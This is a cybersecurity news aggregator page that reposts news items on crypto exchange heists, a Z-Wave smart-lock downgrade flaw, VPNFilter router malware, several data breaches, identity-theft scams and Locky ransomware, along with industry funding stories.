now browsing by tag


#Hacker Steals $13.5 Million From #Bancor #Cryptocurrency #Exchange

In a statement published hours ago, Israeli-based cryptocurrency exchange Bancor fessed up to a security incident following which a hacker made off with roughly $13.5 million worth of cryptocurrency.

The hack took place yesterday, July 9, at 00:00 UTC, according to Bancor, after an unknown intruder(s) gained access to one of the company’s wallets.

This was a big deal because Bancor doesn’t run as a classic exchange platform, but uses a complex mechanism based on smart contracts running on the Ethereum platform to move funds at a quicker pace than classic exchange platforms.

The compromised wallet also granted the attacker access to updating the smart contracts responsible for converting user funds.

Bancor says the hacker used this access to withdraw 24,984 Ether (ETH) coins (~$12.5 million) from Bancor smart contracts and sent the Ether to his own private wallet.

Similarly, he also withdrew 229,356,645 Pundi X (NPXS) coins, worth another $1 million.

Security feature prevents theft of another $10 million

The hacker also withdrew 3,200,000 Bancor tokens (BNT) (worth around $10 million), which Bancor had issued last year as part of its ICO that raised over $150 million, but Bancor says a security feature in Bancor tokens allowed it to freeze the funds and prevent the hacker from cashing it out at other exchanges.

“It is not possible to freeze the ETH and any other stolen tokens,” Bancor says. “However, we are working together with dozens of cryptocurrency exchanges to trace the stolen funds and make it more difficult for their thief to liquidate them.”

Bancor said the hacker didn’t compromise any user wallets. The theft appears to have affected only Bancor’s reserves, which the company held to facilitate the cryptocurrency exchange process.

Bancor did not reveal how the hack took place but promised more updates in the following days via its website and its Twitter account. Bancor’s platform is currently down and undergoing maintenance work.

Last year, a security researcher criticized the Bancor platform for using smart contracts that contained several security flaws.

Below is Bancor’s initial statement regarding yesterday’s security breach.



The post #Hacker Steals $13.5 Million From #Bancor #Cryptocurrency #Exchange appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

A #Basic Z-Wave #Hack #Exposes Up To 100 #Million Smart #Home #Devices

So-called “smart” locks and alarms are proliferating across people’s homes, even though hackers have shown various weaknesses in their designs that contradict their claims to being secure.

Now benevolent hackers in the U.K. have shown just how quick and easy it is to pop open a door with an attack on one of those keyless connected locks. And, what’s more, the five-year-old flaw lies in software that’s been shipped to more than 100 million devices that are supposed to make the home smarter and more secure. Doorbells, bulbs and house alarms are amongst the myriad products from 2,400 different vendors shipping products with the flawed code. Tens of millions of smart home devices are now vulnerable to hacks that could lead to break-ins or a digital haunting, the researchers warned.

For their exploits, the researchers – Ken Munro and Andrew Tierney from Pen Test Partners – focused on the Conexis L1 Smart Door Lock, the $360 flagship product of British company Yale. As relayed to Forbes ahead of the researchers’ report, Munro and Tierney found a vulnerability in an underlying standard used by the device to handle communications between the lock and the paired device that controls the system. The flaw meant the communications could be intercepted and manipulated to make it easy for someone in the local area to steal keys and unlock the door.

The problematic standard was the Z-Wave S2. It provides a way for smart home equipment to communicate wirelessly and is an update from an old protocol, Z-Wave S0, that was vulnerable to exploits that could quickly grab those crucial keys. Indeed, they were “trivial” to decrypt, according to Pen Test Partners’ research.

Z-Wave S2 is more secure than S0. It comes with a method for sharing keys known as the Diffie-Helmann exchange; it’s a highly-regarded, tested method for ensuring that the devices shifting keys between one another are legitimate and trusted. But whilst the Yale device, purchased by Munro and Tierney just a couple of weeks ago and kept up to date, used that S2 protocol, the researchers found it was possible to quickly downgrade the device to the older, much less secure key-sharing mechanism.

During the period when a user paired their controller (such as a smartphone or smart home hub) with the device, Munro and Tierney could ensure the less-secure S0 method was used. From there, they could crack the keys and get permanent access to the Yale lock and therefore whatever building it was protecting, all without the real user’s knowledge. They believe they could carry out their attack, dubbed Z-Shave, from up to 100 meters away.

“It’s not difficult to exploit,” Munro said. “Software Defined Radio tools and a free software Z-Wave controller are all that’s needed.” In 2016, hackers created a free program designed to exploit Z-Wave devices called EZ-Wave.

Yale owner ASSA ABLOY said it understood the Z-Wave Alliance was conducting an investigation into the matter and was in close contact. ASSA ABLOY will also be conducting its own investigation, a spokesperson said, adding that it was “constantly updating and reviewing products in line with the latest technologies, standards and threats.”

No updates?

Munro told Forbes it should be possible to update many Z-Wave-based devices with a wireless update of both the app and the device. “However, it’s an issue with the Z-Wave standard, so would require a massive change by the Alliance, then an update pushed to all devices that support S2, which would likely stop them working with S0 controllers. And there are hardly any S2 controllers on the market. None in the U.K.,” he added.

Silicon Labs (SiLabs), the $4.5 billion market cap firm that owns the Z-Wave tech, admitted “a known device pairing vulnerability” existed. But it didn’t specify any upcoming updates and downplayed the severity of the attack, adding “there have been no known real-world exploits to report.”

The company referred Forbes to the first description of the S0 decryption attack, revealed way back in 2013 by SensePost, which determined the hack wasn’t “interesting” because it was limited to the timeframe of the pairing process. As a result, SiLabs said it didn’t see the S0 device pairing issue “as a serious threat in the real world” as “there is an extremely small window in which anyone could exploit the issue” during the pairing process, adding that a warning will come up if a downgrade attack happens. “S2 is the best-in-class standard for security in the smart home today, with no known vulnerabilities,” the spokesperson added, before pointing to a blog released by SiLabs Wednesday.

Munro said it would be possible to set up an automated attack that would make it more reliable. “It should be easy to set up an automated listener waiting for the pairing, then automatically grab the key,” he said.

The company said the problem existed because of a need to provide backwards compatibility, as a spokesperson explained: “The feature of S2 in question – device pairing – requires both devices have S2 to work at that level. But of course the adoption of this framework across the entire ecosystem doesn’t happen overnight. In the meantime, we do provide the end user with a warning from the controller or hub if an S0 device is on the network or if the network link has degraded to S0.”

Munro was flabbergasted at the vendor’s overall response. “After attempting responsible disclosure and getting little meaningful response, on full disclosure Z-Wave finally acknowledge that it’s been a known issue for the last few years. Internet of Things (IoT) devices are at their most vulnerable during initial set-up. S2 Security does little to solve that problem.”


The post A #Basic Z-Wave #Hack #Exposes Up To 100 #Million Smart #Home #Devices appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Russian #hackers could #instantly cut #off the #internet for #half a #million people

Russian hackers have infected more than half a million routers across 54 countries with sophisticated malware that contains a killswitch to instantly cut internet access to users, security researchers have revealed.

The VPNFilter malware also allows attackers to monitor the web activity of anyone using the routers, including the their passwords, potentially opening up the possibility of further hacks.

“Both the scale and capability of this operation are concerning,” William Largent, a researcher at the cybersecurity firm Talos, said in a blogpost describing the vulnerability.

“The destructive capability particularly concerns us. This shows that the actor is willing to burn users’ devices to cover up their tracks, going much further than simply removing traces of the malware.”

The malware has been attributed to a group of Russian hackers, who are variously known as Sofacy Group, Fancy Bear and Apt28. The group has been in operation since the mid-2000s and has previously been blamed for attacks ranging from the Ukrainian military to the 2017 French elections.

Security researchers tell The Independent that the discovery of the malware highlights a broader issue of how vulnerable internet-connected infrastructure is to cyber attacks.

“No longer can we afford to keep our critical infrastructure connected to, and therefore directly accessible to, the internet,” said Eric Trexler, vice president of global governments and critical infrastructure at cybersecurity firm Forcepoint.

“VPNFilter proves that time tested military techniques such as network segregation not only makes sense, but is required if we expect industrial services to remain resilient in the face of sophisticated and persistent attacks.”

Routers found to be vulnerable to the VPNFilter malware include Linksys, MikroTik, Netgear and TP-Link, all of which are often used in homes or small offices. The researchers say they have not yet completed their research but they are making it public now to draw attention to it.

“Defending against this threat is extremely difficult due to the nature of the affected devices,” Mr Largent said.

“The majority of them are connected directly to the internet, with no security devices or services between them and the potential attackers.”

The FBI responded to the revelations by granting court permission to seize a web domain believed to be in control of the Russian hackers.

“This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities,” Assistant Attorney General for National Security John Demers said in a statement on Wednesday.


FBI Special Agent Bob Johnson added: “Although there is still much to be learned about how this particular threat initially compromises infected routers and other devices, we encourage citizens and businesses to keep their network equipment updates and to change default passwords.

The post Russian #hackers could #instantly cut #off the #internet for #half a #million people appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Under Armour #admits 150 #million #MyFitnessPal #accounts were #hacked

Under Armour said on Thursday that data from some 150 million MyFitnessPal diet and fitness app accounts was compromised in February, in one of the biggest hacks in history, sending shares of the athletic apparel maker down 3 percent in after-hours trade.

The stolen data includes account user names, email addresses and scrambled passwords for the popular MyFitnessPal mobile app and website, Under Armour said in a statement. Social Security numbers, driver license numbers and payment card data were not compromised, it said.

It is the largest data breach this year and one of the top five to date, based on the number of records compromised, according to SecurityScorecard.

Larger hacks include 3 billion Yahoo accounts compromised in a 2013 incident and credentials for more than 412 million users of adult websites run by California-based FriendFinder Networks Inc in 2016, according to breach notification website

Under Armour said it is working with data security firms and law enforcement, but did not provide details on how the hackers got into its network or pulled out the data without getting caught in the act.

While the breach did not include financial data, large troves of stolen email addresses can be valuable to cyber criminals.

Email addresses retrieved in a 2014 attack that compromised data on some 83 million JPMorgan Chase customers was later used in pump-and-dump schemes to boost stock prices, according to U.S. federal indictments in the case in 2015.

Under Armor said in an alert on its website that it will require MyFitnessPal users to change their passwords, and it urged users to do so immediately.

“We continue to monitor for suspicious activity and to coordinate with law enforcement authorities,” the company said, adding that it was bolstering systems that detect and prevent unauthorized access to user information.

Under Armour said it started notifying users of the breach on Thursday, four days after it first learned of the incident.

Under Armour bought MyFitnessPal in 2015 for $475 million. It is part of the company’s connected fitness division, whose revenue last year accounted for 1.8 percent of Under Armour’s $5 billion in total sales.


The post Under Armour #admits 150 #million #MyFitnessPal #accounts were #hacked appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Private #Equity Giants Buy #Cybersecurity #Firm for $400 #Million

Source: National Cyber Security News

The trend of private equity firms snapping up cybersecurity businesses continues.

BlackRock and Pamplona Capital Management have jointly acquired PhishMe, a cybersecurity company based in Leesburg, Va., in a deal that valued the firm at $400 million.

Pamplona has purchased a two-thirds stake in the business, while BlackRock has bought the remainder, a person familiar with the terms of the deal told Fortune.

In addition to the change in ownership, PhishMe on Monday rebranded itself as “Cofense.” The new name derives from a combination of “collaborative” (or “collective”) and “defense.”

Rohyt Belani, CEO and cofounder of the company now called Cofense, said the executive team decided to sell the business to allow “early investors to cash out, and for employees and common stock holders to partake in the spoils.” The company was last privately valued at roughly $200 million after its most recent fundraising round in July 2016, according to Pitchbook, a database that tracks venture capital deals.

The cybersecurity industry benefited from a flurry of VC activity as big data breaches made headlines over the past few years. A recent pullback in funding, however, has left a glut of companies struggling to find new means of financing.

Read More….


View full post on National Cyber Security Ventures

Hackers #steal $64 #million from #cryptocurrency firm #NiceHash

A Slovenian cryptocurrency mining marketplace, NiceHash, said it lost about $64 million worth of bitcoin in a hack of its payment system, the latest incident to highlight risks that uneven oversight and security pose to booming digital currencies.

NiceHash matches people looking to sell processing time on computers in exchange for bitcoin.

There have been at least three dozen heists on exchanges that buy and sell digital currencies since 2011, including one that led to the 2014 collapse of Mt. Gox, once the world’s largest bitcoin market.

More than 980,000 bitcoins have been stolen from exchanges, which would be worth more than $15 billion at current exchange rates. Few have been recovered, leaving some investors without any compensation.

The hacks have not kept demand for digital currencies from soaring. Bitcoin’s value has climbed more than 15-fold so far this year, closing at a record $16,000 on the Luxembourg-based Bitstamp exchange on Thursday, ahead of this weekend’s launch of bitcoin futures by CBOE.

Security experts said they expect the cyber-crime spree to pick up as the rising valuations attract interest from cyber criminals looking for victims that lack experience defending against hacks.

“These exchanges are not in my opinion secure,” said Gartner security analyst Avivah Litan. “You don’t know what their security is like behind the scenes.”

NiceHash executive Andrej P. Škraba told Reuters that his firm was the victim of “a highly professional” heist that yielded about 4,700 bitcoin, worth around $64 million.

Sophisticated criminal groups are increasingly targeting the cryptocurrency industry, focusing on exchanges and other types of firms in the sector, said Noam Jolles, a senior intelligence specialist with Israeli cyber-security company Diskin Advanced Technologies.

“The most sophisticated groups are going into this area,” she said.

NiceHash, which advised users to change online passwords after it halted operations on Wednesday, has provided few other details about the attack on its payment system.

“We ask for patience and understanding while we investigate the causes and find the appropriate solutions for the future of the service,” it said on its website.

It was unclear whether customers faced any losses from the hack.

Slovenian police said they were looking into the hack, but declined to elaborate.

View full post on National Cyber Security Ventures

Governor #Deal announces $35 #million for #cybersecurity center #expansion

Source: National Cyber Security – Produced By Gregory Evans

 Cyber Training and Innovation was already a big project, but it just got bigger, by 35 million dollars to be exact. Today Governor Nathan Deal annouced a second building which is set to begin its construction immediately.

Augusta University Brooks Keel calls it a pretty sweet deal not only for the students and state but the entire country.

The first building won’t be finished until July 2018. This new second one won’t be done until a year from now, Dec. 2018.

Keel says, “it will allow us to just really explode innovation. “

Innovation that he believes can start a boom for business. 
Not just for business in the downtown area near the building but throughout the entire city.

“Its being able to take this piece of training to provide for the workforce and turn that into a giant magnet to bring in business to augusta.” 
He told News 12, that’s going to bring more jobs and attention to Augusta.

It’s this kind of attention that Augusta University cyber students like Bryce Floyd are waiting for. Floyd is a junior who says he’s excited to get to spend at least one semester in the new second building before he graduates.

“Well i’m excited they’re investing that much into my field, and my major and i’m really happy that they’re thinking about the future.”

According to his school president Keel, it’s a future where studying cyber will transform easily into a career. 
Keel said the new building is a part of a ‘concept’ where students would have class on one side of the hallway. Then after class, they could simply walk over to the other side of the hall for their internship.

New halls, new classrooms, more equipment and advanced labs are all a part of the reason why Floyd believes it made sense to add an extra building. 
He believes Augusta earned it.

“This is definitely, in America, probably one of the leading areas for cyber security. “

What was only an idea a year ago– now is a steel structure with a new promise for an even bigger design.

“When Governor Nathan Deal first announced the 50 million dollar facility, then turned it into a 60 million dollar facility, there were two parts to it, innovation and training,” said Dr. Brooks Keel.

You could say Training is being built.

That’s the focus of the first building.

Innovation is the second 35 million dollar, 165,000 square foot building announced today.

It’s going to start being built immediately and will open its doors in a year.

Augusta University President Dr. Brooks Keel says moving quickly is everything in this industry.

“When you’re talking about lightning speed I can’t think of a technology that’s quicker than cyber, and beyond that cybersecurity. You have to be not just on the cutting edge but the bleeding edge to be on top of the growth with cyber,” he said.

That’s exactly what Governor Deal wants, he says these projects will help make Georgia the leader in the nation for cyber, setting Augusta and Augusta University ahead as well. While the project grows, the schools reach grows also.

“I’ve been saying for a while that’s just phase one, here’s phase two, and there’s more to come on that parcel of land there,” he said.

So the now more than 90 million dollars in cyber investments in downtown Augusta is paving the way for a brighter future from city, to the state, to the whole nation.

 Governor Deal announced $35 million in funding to expand Augusta’s Hull McKnight Georgia Cyber Innovation and Training Center.

According to a release from the Governor’s Communications Office, Deal said, “Given Georgia’s growing status as a technology and innovation hub, this additional investment will further cement our reputation as the ‘Silicon Valley of the South.’ When complete, the center will house a cyber range, the Georgia Bureau of Investigation’s new cyber crime unit and an incubator for startup cybersecurity companies.”

Construction of the new facility will begin immediately. The 165,000 square foot space will serve as a training facility for information security professionals employed by state and local governments. 
The space will also allow tech companies to establish fellowships, internships, and co-op programs for students and employees.

The Georgia Technology Authority (GTA) will oversee the construction and the operation of the cybersecurity center facilities. The GTA is partnered with the U.S. Army Center of Excellence at Fort Gordon, the Georgia, National Guard, Georgia Bureau of Investigation, and the City of Augusta to name a few. The GTA is also partnered with schools, colleges, and private corporations.

The first phase of the Cyber Center is scheduled to open in July. The Second is scheduled to be completed December 2018.

The post Governor #Deal announces $35 #million for #cybersecurity center #expansion appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach

Source: National Cyber Security – Produced By Gregory Evans

Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach

Hackers have once again targeted Verticalscope, a Canadian firm that manages hundreds of popular web discussion forums with over 45 million user accounts. The breach has compromised at least 2.7 million user accounts. The Toronto-based company runs a network of support forums and online community websites catering to a wide range of interests, from outdoor and automotive to sports and technology.

In June 2016, Verticalscope admitted that it had suffered a data breach that saw at least 45 million user accounts compromised and their data leaked in a blog post on

The latest breach impacted six websites, including – the company’s second-most popular website – and, security expert Brian Krebs first reported.

Security researcher and founder of Hold Security, Alex Holden, notified Krebs last week that hackers were selling access to and a number of other sites operated by the company.

Holden initially suspected that a nefarious actor was just trying to resell data stolen in the 2016 breach.

“That was before he contacted one of the hackers selling the data and was given screen shots indicating that and several other properties were in fact compromised with a backdoor known as a ‘Web shell’,” Krebs wrote. “With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account.”

The hackers reportedly obfuscated certain details in the screenshots that allowed him to locate at least two backdoors on Verticalscope’s website and, one of the company’s most popular forums.

Krebs reported that a simple search on one of Verticalscope’s compromised domains led to a series of Pastebin posts that have since been deleted “suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB”.

“Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address,” Krebs noted. “The first search is free, but viewing results requires purchasing a subscription for between $5 and $400 in Bitcoin.”

“The intrusion granted access to each individual website files,” Verticalscope said in a statement to Krebs. “Out of an abundance of caution, we have removed the file manager, expired all passwords on the 6 websites in question, added the malicious file pattern and attack vector to our detection tools, and taken additional steps to lock down access.”

The company did not provide any details regarding when and how the attack took place or who carried out the hack. IBTimes UK has reached out to Verticalscope for further details.

The post Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Identity #theft alert: How 77,0000 Canadians lost $99 million last year in #extortion, #phishing and #romance scams

Source: National Cyber Security – Produced By Gregory Evans

Identity #theft alert: How 77,0000 Canadians lost $99 million last year in #extortion, #phishing and #romance scams

Randy Chester was visiting one of his usual second-hand haunts this summer, a Value Village in Toronto’s east end, when he spied a beautiful shirt and vest for $20. Excited about his new finds, he tapped his debit card, only to be shocked by the resulting message: Insufficient funds.

“I was upset because I knew I had money,” he recalls. He tried the card again at a variety store, a restaurant and then at an ATM belonging to his bank, CIBC, and got the same message. When he called the bank to see what was going on, they asked him if he had been shopping at Yorkdale Mall in the city’s north end. There was a $1,500 purchase debited from his account, but Chester, a cancer patient on disability who uses a walker, had been at a medical appointment at the Princess Margaret Cancer Hospital that day.

“It’s like, hello!” he jokes. “Value Village, yes. Yorkdale Mall, no. I couldn’t get there with my walker.”

Then he remembered that a young man had called him on his flip-phone a few days before, claiming to be from CIBC and saying there was a problem with his debit card. Chester knew better than to talk to anyone about his banking information and hung up. The next day, he got a text message, purportedly from CIBC, that had the last four digits of his debit card number in it, and asked him to text back “Y” for yes if it was his account. He assumed because they had his number already, it was legitimate. He hit Y and send.

“The bank told me they would never send a text message,” says Chester, 61. “I didn’t know that.”

Once he reported the problem, the bank locked down his account, reversed the charges, and gave him a new bank card. But it’s impossible to tell how the scammers got his bank information, which is often the case when it comes to identity theft, says Jessica Gunson, the acting call centre and intake unit manager at the Canadian Anti-Fraud Centre in Thunder Bay, Ont.

“It certainly sounds like a variation on phishing,” she says, but notes that it’s unusual because the thief already had Chester’s bank information when he or she sent the text.

“We do know thieves have been known to dumpster dive, and it underlines the importance of having a paper shredder in the home and in the office. We need to treat our personal information like cash.” For that reason, experts advise leaving your Social Insurance Number card and birth certificate in a safe place at home, since thieves can do a lot of damage with your name, birth date and SIN.

The Canadian Anti-fraud Centre, jointly managed by the Ontario Provincial Police, the RCMP, the federal Competition Bureau, manages the central database for fraud complaints. Investigators across the country rely on its vast stores of data to compare notes on mass-marketing fraud and online scams. In 2016, it logged more than 77,000 complaints that resulted in losses of more than $99-million, with the top scams by complaint involving extortion, phishing, and fake computer-service companies. The frauds that resulted in the most money lost were romance scams, at more than $20-million.

Though Gunson could not begin to guess how criminals got Chester’s information, she said it is important never to leave a paper receipt of a transaction in or near the banking machine, and to use online banking to check balances, rather than printing them out at ATMs.

“When it comes to identity theft and identity fraud, the difficulty is in pinpointing the source. Unless (investigators) find a boiler room where people are mass producing ID, it is difficult to determine on an individual basis where it is coming from.”

The good news is most cases of identity theft and identity fraud result in little financial loss to the victims, but Gunson says it takes time and effort to untangle the mess.

In Montreal, actor Paul Burke figures someone used a surveillance camera or fake keypad or card reader to obtain his PIN, which they used to empty his account of $700 in the summer of 2010. He called the bank, which contacted the RCMP. And then he waited.

“ I called them back after a week and I said, ‘I have zero money. I need my money back,” says Burke, 48.

Within a day or two of that call he had the money in his account, but to this day he has no clue what happened.

“It was so bizarre. I consider it a one-off, but obviously I should be more careful.”

The post Identity #theft alert: How 77,0000 Canadians lost $99 million last year in #extortion, #phishing and #romance scams appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

20 Million Confirmed #Attacks in 24 Hours: #Locky and Other #Ransomware

Source: National Cyber Security – Produced By Gregory Evans

20 Million Confirmed #Attacks in 24 Hours: #Locky and Other #Ransomware

A new variant of the aggressive “Locky” ransomware hits 20 million confirmed attacks in a single day, warns a cybersecurity firm.

Ransomware actors are sometimes incredibly sophisticated, demonstrating careful planning and methodical execution. Some hacker individuals or groups can launch large-scale attacks, casting the widest net possible to catch the maximum number of victims.

To protect yourself, it’s best to get familiar with the types of ransomware out there and how to avoid them.

Here are some figures to give you an idea of the massive scale on which ransomware operates:

Last year, ransomware spread increased by a staggering 500%, with email phishing as the most-used distribution method.
In a given month, ransomware infects 30,000-35,000 devices on average.
During the first 6 months of 2016, 300 new ransomware variants were developed. During the same period, an unknown ransomware actor made nearly $100 million USD in profits.
This year, profits generated through ransomware are expected to hit $1 billion USD.

Locky, a Sneaky Ransomware

First appearing in February 2016, Locky is ransomware, a type of malware that takes hostage all files by encrypting them and demanding a ransom from the victim to have their files returned unencrypted. Usually, with the proliferation of cryptocurrencies, hackers ask for ransoms to be paid in Bitcoin, for obvious reasons (learn more about Bitcoin anonymity here).

Like most ransomware, Locky infects a system via spam (email sent by a botnet), to which a .doc file is attached. These emails often come with a subject that reads: “ATTN: Invoice…”, with a message asking the payment of an invoice urgently.

If the victim clicks on the link, Locky will be quickly installed then it scrambles and renames all files with the extension “.locky” within a system, as well as files in other systems connected to the same network.

This ransomware also removes backup copies (shadow copies) of Windows which makes it impossible to recover files through this method.

Believed to be released by the same hackers who were behind Dridex ransomware in 2015, Locky has been spreading like wildfire across the web in 2017, evolving every now and then by using new sneaky distribution methods.

Just last month, it was revealed that a new version of Locky attacked millions of systems in just one day.

Locky’s Back With new Aggressive Variant

The threat, according to researchers at Barracuda Networks Advanced Technology Group, comes in the form of a new very aggressive version of the strain of ransomware known as Locky.

Per a Barracuda blog post, the attacks originate predominantly from Vietnam, but hotbeds include other countries across three continents, like India, Turkey, Colombia, and Greece, albeit in very low volumes as compared to those from Vietnam.

Barracuda analysts say that about 20 million of these attacks occurred in 24 hours, from the 18th to the 19th of September, and this figure was growing rapidly. Most of the spam emails claim to be from the “Herbalife company” or fake “copier file delivery”.

In an update, Barracuda said its researchers confirmed that the attacks use a variant of the Locky ransomware with a unique identifier. Identifiers are supposed to let hackers ID victims in order to send them tools to decrypt data after the ransom is paid.

This time, however, all victims have been assigned the same identifier, which means that even if victims pay the ransom they won’t receive decryption tools.

Barracuda also said its filters had blocked about 27 million Locky-related emails, adding that its researchers are actively monitoring the situation.

EdgyLabs readers, here’s what you can do if you fall a victim to a Locky or other ransomware attack:

Whatever you do, don’t pay the ransom because paying cybercriminals is tantamount to nourishing their behavior, unless of course there’s no other way to get your “critical” data back.

But in the case of this new vague of Locky attacks, as security researchers found out (same ID for all victims), just don’t bother, because you’re not getting decryption tools anyway whether the ransom was paid or not.

You can remove Locky ransomware using your average antivirus program. You can try to recover your encrypted data by restoring backup copies, but that’s not guaranteed with the new strain of Locky that deletes shadow copies.

Besides updating your antivirus and using spam filters, in the case of ransomware, remember to not open an attached file from suspicious emails of unverified origins and delete them.

But before all of that, make sure you use 3-2-1 data protection.

Use 3-2-1 Data Protection

3 copies of your data
2 separate types of media (tape, disk, deduplication)
1 offline and off-site copy
As always, whenever a hard data drive is compromised, it’s best to reformat the drive completely before using it again in the future.

The post 20 Million Confirmed #Attacks in 24 Hours: #Locky and Other #Ransomware appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures